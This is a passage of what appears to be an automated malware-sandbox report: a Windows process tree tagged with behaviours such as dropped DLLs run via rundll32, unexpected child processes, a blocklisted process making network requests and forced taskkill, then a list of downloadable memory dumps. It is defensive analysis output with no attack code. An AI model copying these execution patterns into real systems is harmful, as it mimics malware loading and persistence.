                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 692
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:5348
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 864
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:5652
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 904
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:5796
                                                          • C:\Windows\system32\rundll32.exe
                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            PID:3192
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                              2⤵
                                                              • Loads dropped DLL
                                                              • Modifies registry class
                                                              PID:3700
                                                          • C:\Windows\system32\rundll32.exe
                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            PID:5872
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                              2⤵
                                                              • Loads dropped DLL
                                                              PID:5912
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5912 -s 624
                                                                3⤵
                                                                • Program crash
                                                                PID:5980
                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                            1⤵
                                                            • Drops file in Windows directory
                                                            • Modifies Internet Explorer settings
                                                            • Modifies registry class
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:6264
                                                          • C:\Windows\system32\browser_broker.exe
                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                            1⤵
                                                            • Modifies Internet Explorer settings
                                                            PID:6396
                                                          • C:\Windows\system32\msiexec.exe
                                                            C:\Windows\system32\msiexec.exe /V
                                                            1⤵
                                                            • Enumerates connected drives
                                                            • Drops file in Program Files directory
                                                            • Drops file in Windows directory
                                                            • Modifies data under HKEY_USERS
                                                            • Modifies registry class
                                                            PID:5944
                                                            • C:\Windows\syswow64\MsiExec.exe
                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 4DD9B694F8AD740CF7EBAC521341EBA5 C
                                                              2⤵
                                                              • Loads dropped DLL
                                                              PID:5196
                                                            • C:\Windows\syswow64\MsiExec.exe
                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 5849F87FB2174C7B62DDBA821C6977D2
                                                              2⤵
                                                              • Blocklisted process makes network request
                                                              • Loads dropped DLL
                                                              PID:6648
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                3⤵
                                                                • Kills process with taskkill
                                                                PID:6756
                                                            • C:\Windows\syswow64\MsiExec.exe
                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 7CBF008AE2AA88C48B3770C35B4E34B2 E Global\MSI0000
                                                              2⤵
                                                              • Loads dropped DLL
                                                              PID:892
                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                            1⤵
                                                            • Modifies registry class
                                                            • Suspicious behavior: MapViewOfSection
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5544
                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                            1⤵
                                                            • Drops file in Windows directory
                                                            • Modifies Internet Explorer settings
                                                            • Modifies registry class
                                                            PID:3988
                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                            1⤵
                                                            • Modifies registry class
                                                            PID:6948
                                                          • \??\c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                            1⤵
                                                              PID:4308
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                              1⤵
                                                              • Drops file in Windows directory
                                                              • Modifies registry class
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:6992
                                                            • C:\Windows\system32\browser_broker.exe
                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                              1⤵
                                                              • Modifies Internet Explorer settings
                                                              PID:6464
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                              1⤵
                                                              • Modifies registry class
                                                              • Suspicious behavior: MapViewOfSection
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:5672
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                              1⤵
                                                              • Drops file in Windows directory
                                                              PID:4496
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                              1⤵
                                                              • Drops file in Windows directory
                                                              • Modifies registry class
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:6732
                                                            • C:\Windows\system32\browser_broker.exe
                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                              1⤵
                                                              • Modifies Internet Explorer settings
                                                              PID:6156
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                              1⤵
                                                              • Suspicious behavior: MapViewOfSection
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:4776
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                              1⤵
                                                              • Drops file in Windows directory
                                                              PID:6632
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                              1⤵
                                                              • Drops file in Windows directory
                                                              • Modifies registry class
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:5432
                                                            • C:\Windows\system32\browser_broker.exe
                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                              1⤵
                                                              • Modifies Internet Explorer settings
                                                              PID:6788
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                              1⤵
                                                              • Modifies registry class
                                                              • Suspicious behavior: MapViewOfSection
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:2332
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                              1⤵
                                                              • Drops file in Windows directory
                                                              • Modifies registry class
                                                              PID:3440
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                              1⤵
                                                              • Drops file in Windows directory
                                                              • Modifies registry class
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:6300
                                                            • C:\Windows\system32\browser_broker.exe
                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                              1⤵
                                                              • Modifies Internet Explorer settings
                                                              PID:4808
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                              1⤵
                                                              • Suspicious behavior: MapViewOfSection
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:6648
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                              1⤵
                                                              • Drops file in Windows directory
                                                              • Modifies registry class
                                                              PID:5604
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                              1⤵
                                                              • Drops file in Windows directory
                                                              PID:6272
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                              1⤵
                                                              • Drops file in Windows directory
                                                              • Modifies registry class
                                                              PID:4180
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                              1⤵
                                                              • Modifies registry class
                                                              PID:4220
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                              1⤵
                                                              • Drops file in Windows directory
                                                              • Modifies registry class
                                                              PID:5708
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                              1⤵
                                                                PID:6664

                                                              Network

                                                              MITRE ATT&CK Enterprise v6

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • memory/396-375-0x000001A3BEA50000-0x000001A3BEAC4000-memory.dmp

                                                                Filesize

                                                                464KB

                                                                Download

                                                              • memory/536-212-0x0000000001630000-0x0000000001632000-memory.dmp

                                                                Filesize

                                                                8KB

                                                                Download

                                                              • memory/536-180-0x0000000000F10000-0x0000000000F11000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/536-195-0x0000000001620000-0x0000000001621000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/608-658-0x0000000002AF0000-0x0000000002AF2000-memory.dmp

                                                                Filesize

                                                                8KB

                                                                Download

                                                              • memory/732-323-0x00000000001D0000-0x00000000001FF000-memory.dmp

                                                                Filesize

                                                                188KB

                                                                Download

                                                              • memory/732-324-0x0000000000400000-0x0000000000458000-memory.dmp

                                                                Filesize

                                                                352KB

                                                                Download

                                                              • memory/888-222-0x0000000000030000-0x0000000000039000-memory.dmp

                                                                Filesize

                                                                36KB

                                                                Download

                                                              • memory/888-223-0x0000000000400000-0x000000000044D000-memory.dmp

                                                                Filesize

                                                                308KB

                                                                Download

                                                              • memory/944-175-0x00000000009D0000-0x00000000009D1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/944-197-0x000000001B5E0000-0x000000001B5E2000-memory.dmp

                                                                Filesize

                                                                8KB

                                                                Download

                                                              • memory/988-268-0x00000000062A0000-0x00000000062A1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/988-205-0x00000000008D0000-0x00000000008D1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/988-236-0x0000000005400000-0x000000000541D000-memory.dmp

                                                                Filesize

                                                                116KB

                                                                Download

                                                              • memory/988-211-0x0000000005140000-0x0000000005141000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/988-237-0x0000000006150000-0x0000000006151000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/988-235-0x0000000006010000-0x0000000006033000-memory.dmp

                                                                Filesize

                                                                140KB

                                                                Download

                                                              • memory/988-242-0x0000000006870000-0x0000000006871000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/988-246-0x0000000006110000-0x0000000006111000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/988-247-0x0000000006370000-0x0000000006371000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/988-217-0x0000000005420000-0x0000000005421000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/1064-404-0x00000294CDA70000-0x00000294CDAE4000-memory.dmp

                                                                Filesize

                                                                464KB

                                                                Download

                                                              • memory/1160-402-0x0000018FF0B60000-0x0000018FF0BD4000-memory.dmp

                                                                Filesize

                                                                464KB

                                                                Download

                                                              • memory/1176-410-0x00000264ED4B0000-0x00000264ED524000-memory.dmp

                                                                Filesize

                                                                464KB

                                                                Download

                                                              • memory/1224-224-0x00000000008F0000-0x0000000000938000-memory.dmp

                                                                Filesize

                                                                288KB

                                                                Download

                                                              • memory/1224-225-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                Filesize

                                                                408KB

                                                                Download

                                                              • memory/1300-315-0x0000017831E04000-0x0000017831E05000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/1300-302-0x0000017831E00000-0x0000017831E02000-memory.dmp

                                                                Filesize

                                                                8KB

                                                                Download

                                                              • memory/1300-317-0x0000017831E05000-0x0000017831E07000-memory.dmp

                                                                Filesize

                                                                8KB

                                                                Download

                                                              • memory/1300-312-0x0000017831E02000-0x0000017831E04000-memory.dmp

                                                                Filesize

                                                                8KB

                                                                Download

                                                              • memory/1300-286-0x0000017817750000-0x0000017817751000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/1336-226-0x00000000009A0000-0x0000000000A74000-memory.dmp

                                                                Filesize

                                                                848KB

                                                                Download

                                                              • memory/1336-227-0x0000000000400000-0x00000000004D7000-memory.dmp

                                                                Filesize

                                                                860KB

                                                                Download

                                                              • memory/1392-442-0x00000256C9A80000-0x00000256C9AF4000-memory.dmp

                                                                Filesize

                                                                464KB

                                                                Download

                                                              • memory/1412-408-0x0000029BFA740000-0x0000029BFA7B4000-memory.dmp

                                                                Filesize

                                                                464KB

                                                                Download

                                                              • memory/1420-219-0x00000214F83C2000-0x00000214F83C4000-memory.dmp

                                                                Filesize

                                                                8KB

                                                                Download

                                                              • memory/1420-220-0x00000214F83C5000-0x00000214F83C7000-memory.dmp

                                                                Filesize

                                                                8KB

                                                                Download

                                                              • memory/1420-191-0x00000214F5B80000-0x00000214F5B81000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/1420-232-0x00000214FC590000-0x00000214FC591000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/1420-201-0x00000214F7950000-0x00000214F795B000-memory.dmp

                                                                Filesize

                                                                44KB

                                                                Download

                                                              • memory/1420-204-0x00000214F9320000-0x00000214F9321000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/1420-210-0x00000214F83C0000-0x00000214F83C2000-memory.dmp

                                                                Filesize

                                                                8KB

                                                                Download

                                                              • memory/1420-214-0x00000214FC230000-0x00000214FC2AE000-memory.dmp

                                                                Filesize

                                                                504KB

                                                                Download

                                                              • memory/1420-221-0x00000214F83C4000-0x00000214F83C5000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/1728-134-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                Filesize

                                                                100KB

                                                                Download

                                                              • memory/1728-132-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                Filesize

                                                                572KB

                                                                Download

                                                              • memory/1728-133-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                Filesize

                                                                1.5MB

                                                                Download

                                                              • memory/1728-137-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                Filesize

                                                                100KB

                                                                Download

                                                              • memory/1728-138-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                Filesize

                                                                100KB

                                                                Download

                                                              • memory/1728-136-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                Filesize

                                                                100KB

                                                                Download

                                                              • memory/1728-135-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                Filesize

                                                                152KB

                                                                Download

                                                              • memory/1860-412-0x00000294C8A80000-0x00000294C8AF4000-memory.dmp

                                                                Filesize

                                                                464KB

                                                                Download

                                                              • memory/2020-345-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2060-215-0x0000000006FD0000-0x0000000006FD1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2060-250-0x00000000087C0000-0x00000000087C1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2060-230-0x0000000007C40000-0x0000000007C41000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2060-207-0x0000000004D00000-0x0000000004D01000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2060-229-0x0000000007E20000-0x0000000007E21000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2060-231-0x00000000074B0000-0x00000000074B1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2060-233-0x0000000007E90000-0x0000000007E91000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2060-385-0x0000000006FD3000-0x0000000006FD4000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2060-248-0x0000000007CF0000-0x0000000007CF1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2060-218-0x0000000007370000-0x0000000007371000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2060-261-0x00000000086A0000-0x00000000086A1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2060-209-0x0000000007610000-0x0000000007611000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2060-228-0x0000000007540000-0x0000000007541000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2060-216-0x0000000006FD2000-0x0000000006FD3000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2060-349-0x000000007F330000-0x000000007F331000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2064-295-0x0000000000530000-0x0000000000545000-memory.dmp

                                                                Filesize

                                                                84KB

                                                                Download

                                                              • memory/2096-325-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                Filesize

                                                                80KB

                                                                Download

                                                              • memory/2384-386-0x0000025029760000-0x00000250297D4000-memory.dmp

                                                                Filesize

                                                                464KB

                                                                Download

                                                              • memory/2404-380-0x0000015476050000-0x00000154760C4000-memory.dmp

                                                                Filesize

                                                                464KB

                                                                Download

                                                              • memory/2428-198-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                                Download

                                                              • memory/2548-381-0x0000020922600000-0x0000020922674000-memory.dmp

                                                                Filesize

                                                                464KB

                                                                Download

                                                              • memory/2616-383-0x0000028156AD0000-0x0000028156B44000-memory.dmp

                                                                Filesize

                                                                464KB

                                                                Download

                                                              • memory/2616-662-0x0000028158310000-0x000002815832B000-memory.dmp

                                                                Filesize

                                                                108KB

                                                                Download

                                                              • memory/2672-281-0x0000000000480000-0x0000000000481000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2672-293-0x000000001B0A0000-0x000000001B0A2000-memory.dmp

                                                                Filesize

                                                                8KB

                                                                Download

                                                              • memory/2676-443-0x000002FBB1970000-0x000002FBB19E4000-memory.dmp

                                                                Filesize

                                                                464KB

                                                                Download

                                                              • memory/2696-446-0x00000230A3970000-0x00000230A39E4000-memory.dmp

                                                                Filesize

                                                                464KB

                                                                Download

                                                              • memory/2984-266-0x0000000000380000-0x0000000000381000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/2984-277-0x000000001AF90000-0x000000001AF92000-memory.dmp

                                                                Filesize

                                                                8KB

                                                                Download

                                                              • memory/3488-253-0x00000000001B0000-0x00000000001B1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/3700-374-0x00000000044B0000-0x000000000450F000-memory.dmp

                                                                Filesize

                                                                380KB

                                                                Download

                                                              • memory/3700-372-0x00000000043A1000-0x00000000044A2000-memory.dmp

                                                                Filesize

                                                                1.0MB

                                                                Download

                                                              • memory/3804-335-0x0000000000400000-0x0000000000460000-memory.dmp

                                                                Filesize

                                                                384KB

                                                                Download

                                                              • memory/3804-351-0x0000000002304000-0x0000000002306000-memory.dmp

                                                                Filesize

                                                                8KB

                                                                Download

                                                              • memory/3804-326-0x0000000000460000-0x000000000050E000-memory.dmp

                                                                Filesize

                                                                696KB

                                                                Download

                                                              • memory/3804-330-0x0000000000680000-0x000000000069F000-memory.dmp

                                                                Filesize

                                                                124KB

                                                                Download

                                                              • memory/3804-338-0x0000000002300000-0x0000000002301000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/3804-341-0x0000000002303000-0x0000000002304000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/3804-339-0x0000000002302000-0x0000000002303000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/4120-300-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                Filesize

                                                                80KB

                                                                Download

                                                              • memory/4124-244-0x0000000000980000-0x0000000000981000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/4160-213-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/4332-316-0x0000000005870000-0x0000000005871000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/4332-311-0x0000000000F10000-0x0000000000F11000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/4424-258-0x00000000003D0000-0x00000000003D1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/4424-260-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/4424-276-0x000000001AEF0000-0x000000001AEF2000-memory.dmp

                                                                Filesize

                                                                8KB

                                                                Download

                                                              • memory/4456-318-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                                Download

                                                              • memory/4688-376-0x000001DC37AE0000-0x000001DC37B2D000-memory.dmp

                                                                Filesize

                                                                308KB

                                                                Download

                                                              • memory/4688-379-0x000001DC37BA0000-0x000001DC37C14000-memory.dmp

                                                                Filesize

                                                                464KB

                                                                Download

                                                              • memory/5912-473-0x0000000004F23000-0x0000000005024000-memory.dmp

                                                                Filesize

                                                                1.0MB

                                                                Download